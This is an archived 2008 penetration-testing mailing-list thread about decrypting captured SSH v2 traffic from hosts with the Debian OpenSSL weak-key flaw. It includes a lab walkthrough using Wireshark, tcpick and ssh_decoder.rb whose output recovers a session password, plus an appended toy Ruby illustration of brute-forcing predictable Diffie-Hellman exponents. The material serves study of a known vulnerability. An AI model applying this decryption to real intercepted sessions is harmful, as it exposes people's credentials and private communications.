Penetration Testing: Re: How to decrypt a connection SSH v2?

Re: How to decrypt a connection SSH v2?

From: Ulises2k <ulises2k_at_gmail.com>
Date: Thu, 10 Jul 2008 17:38:07 -0300

Hi.
I did it.
Many thanks to Raphaël Rigo, developer of ssh_decoder. [0]

I have 2 virtual machines: 1 Ubuntu 8.04 server (not updated) and 1
Ubuntu 8.04 client (not updated).
The VMs have the libssl vulnerability discovered by Luciano Bello in May 2008.

Client TTY 1:
$ sudo wireshark

In another terminal (TTY2), run:
$ ssh 192.168.230.143
user@192.168.230.143's password:
Last login: Wed Jul 9 17:10:04 2008 from 192.168.230.144
user@ubuntu804server:~$ echo "este es un comando tirado en el server"
user@ubuntu804server:~$ exit

Client TTY1:
Stop sniffing in Wireshark.
Save the capture as "sshv2.cap".

$ tcpick -wRC -wRS -r sshv2.cap
Starting tcpick 0.2.1 at 2008-07-10 14:14 EDT
Timeout for connections is 600
tcpick: reading from sshv2.cap
1 SYN-SENT 192.168.230.144:44550 > 192.168.230.143:ssh
1 SYN-RECEIVED 192.168.230.144:44550 > 192.168.230.143:ssh
1 ESTABLISHED 192.168.230.144:44550 > 192.168.230.143:ssh
1 FIN-WAIT-1 192.168.230.144:44550 > 192.168.230.143:ssh
1 TIME-WAIT 192.168.230.144:44550 > 192.168.230.143:ssh
1 CLOSED 192.168.230.144:44550 > 192.168.230.143:ssh
tcpick: done reading from sshv2.cap

81 packets captured
1 tcp sessions detected

$ ruby ssh_decoder.rb tcpick*
 * read handshake
cipher: aes128-cbc, mac: hmac-md5, kex_hash: sha256, compr: none
 * bruteforce DH
DH shared secret :
63368d70f36fca060daa9d83b67f68bdd3cd9a4a150b27bfa51689f091b5d8857eb3b93057430be1577e45bb742b4528dca889cbda21de1ab2ec0ba1e364b421aa2797c1ad4667a66c7b20317842b5c509160a38629ae551e128b64e4af73d5ce7331342d8d9bd6128c3c89e0d2a55b6c4c5b7da06eead4dee4e3eb5d01d1210
 * derive keys
 * decipher streams
 * successful authentication packet
{:username=>"user",
 :nextservice=>"ssh-connection",
 :auth_method=>"password",
 :change=>0,
 :password=>"superpassword"}
 * deciphered streams saved to "sshdecrypt.0.client.dat" &
"sshdecrypt.0.server.dat"

User: User
Password: superpassword

sshdecrypt.0.client.dat and sshdecrypt.0.server.dat contain everything in
plain text (user/password/command).

The scripts (ssh_decoder and ssh_kex_keygen) generate the private key.

Download ssh_decoder and ssh_kex_keygen [0]

[0] http://www.cr0.org/progs/sshfun/

Thank you very much.

--
Ulises U. Cuñé
Web: http://www.ulises2k.com.ar

On Thu, Jul 10, 2008 at 14:25, Gary E. Miller <gem_at_rellim.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Yo Paul!
>
> On Thu, 10 Jul 2008, Paul Melson wrote:
>
>> > I assume if the attacker has the public and private keys from not just
>> > one, but both ends, that PFS is not an obstacle.
>
>> It's my understanding that even if you have both endpoints' public and
>> private key pairs, that's not enough to recreate the ephemeral keys used
>> during a particular session.  Without those keys, the packet capture cannot
>> be decrypted.
>
> Read the RFC and tell me that again:
>        http://tools.ietf.org/html/rfc4253#section-8
>
>        "The Diffie-Hellman (DH) key exchange provides a shared secret
>        that cannot be determined by either party alone. "
>                                  ^^^^^^^^^^^^^^^^^^^^^^
>
> The whole point of the key exchange is to use both sets of
> public/private keys to generate this shared secret, and only those 4
> keys.  If you possess those 4 keys then game over, you can decode the
> shared key.
>
> Looks to me that the RFC tells you all you need to know to recover
> the shared secret.    If someone had some time on their hands
> they could probably grab most of the needed code out of the openssh
> code.
>
> RGDS
> GARY
> - ---------------------------------------------------------------------------
> Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701
>        gem_at_rellim.com  Tel:+1(541)382-8588
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.3 (GNU/Linux)
>
> iD8DBQFIdkX/8KZibdeR3qURAqX2AJoDno9k9Onk6W5ZpGbMF1eCxKBGBwCZAYA2
> bDDCaensdMGUAl9j+ZaWz7o=
> =CXfX
> -----END PGP SIGNATURE-----
>
>
Received on Jul 10 2008
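
The "bruteforce DH" step in the tool output above depends on the Diffie-Hellman private exponent being predictable. The following Ruby sketch is an added illustration, not part of the original thread and not ssh_decoder's code: it shows why a session negotiated with a guessable exponent must be treated as readable from a capture, while one negotiated with a sound generator is not. The toy group, the `weak_exponent` model and the seed value are assumptions constructed for the example.

```ruby
require 'digest'
require 'securerandom'

# Constructed toy group for illustration only: 2**127 - 1 is prime, but this
# is not one of the groups SSH negotiates.
P = 2**127 - 1
G = 3

# Hypothetical model of a broken generator: the "random" exponent is fully
# determined by a seed that has only 32,768 possible values.
def weak_exponent(seed)
  Digest::SHA256.hexdigest("toy-prng-#{seed}").to_i(16) % (P - 2) + 1
end

# What a sound generator provides: an exponent nobody can enumerate.
def strong_exponent
  SecureRandom.random_number(P - 2) + 1
end

# One side of the exchange: returns [public value, private exponent].
def dh_public(x)
  [G.pow(x, P), x]
end

# A passive observer sees only e = G^x and f = G^y. If x came from the weak
# generator, matching G^x against e identifies x, and K = f^x follows.
def recover_shared_secret(e, f, seeds)
  seeds.each do |seed|
    x = weak_exponent(seed)
    return f.pow(x, P) if G.pow(x, P) == e
  end
  nil
end

SEEDS = (1..32_768)

# Case 1: client exponent from the weak generator (the seed is constructed).
e_weak, _x = dh_public(weak_exponent(20_431))
f, y = dh_public(strong_exponent)
K_WEAK = e_weak.pow(y, P) # the value the server computes for this session
RECOVERED_WEAK = recover_shared_secret(e_weak, f, SEEDS)

# Case 2: both exponents from a sound generator; the search finds nothing.
e_strong, _x2 = dh_public(strong_exponent)
RECOVERED_STRONG = recover_shared_secret(e_strong, f, SEEDS)

puts "weak client:   secret recovered = #{RECOVERED_WEAK == K_WEAK}"
puts "strong client: secret recovered = #{!RECOVERED_STRONG.nil?}"
```

Only one side's exponent has to be predictable for the shared secret to fall, which is why past sessions from an affected host stay exposed even when the peer was patched.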